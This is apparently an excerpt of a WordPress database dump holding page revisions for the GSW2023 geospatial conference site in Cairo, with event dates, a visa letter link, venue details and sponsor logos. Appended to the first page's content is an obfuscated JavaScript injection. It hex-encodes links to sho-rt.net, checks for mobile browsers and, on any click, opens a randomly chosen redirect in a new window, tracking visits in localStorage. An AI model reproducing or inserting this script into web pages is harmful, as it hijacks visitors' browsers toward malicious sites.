1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:30:08','2023-08-16 00:30:08','',3066,'https://gsw2023.com/?p=5259',0,'revision','',0),
(5260,1,'2023-08-16 00:30:32','2023-08-16 00:30:32','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: 